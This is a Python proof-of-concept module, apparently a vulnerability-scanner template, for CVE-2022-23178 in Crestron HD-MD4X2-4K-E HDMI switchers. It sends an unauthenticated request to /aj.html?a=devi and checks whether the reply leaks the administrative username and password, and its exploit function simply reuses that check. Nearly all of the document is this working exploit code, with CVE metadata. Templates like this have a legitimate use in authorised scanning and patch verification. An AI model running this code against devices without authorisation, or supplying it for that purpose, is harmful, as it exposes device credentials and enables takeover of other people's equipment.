import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Crestron Device - Credentials Disclosure''',
        "description": '''An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.''',
        "severity": "critical",
        "references": [
            "https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device", 
            "https://nvd.nist.gov/vuln/detail/CVE-2022-23178", 
            "https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": "9.8",
            "cve-id": "CVE-2022-23178",
            "cwe-id": "CWE-287"
        },
        "metadata":{
            "vuln-target": "",
            
        },
        "tags": ["cve", "cve2022", "crestron", "disclosure"],
    }


# Vender Fingerprint
def fingerprint(url):
    return True

# Proof of Concept
def poc(url):
    result = {}
    try:
        url = format_url(url)
        path = '/aj.html?a=devi'

        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and '"uname":' in resp.text and '"upassword":' in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    except:
        result["success"] = False
    
    return result


# Exploit, can be same with poc()
def exp(url):
    return poc(url)


# Utils
def format_url(url):
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url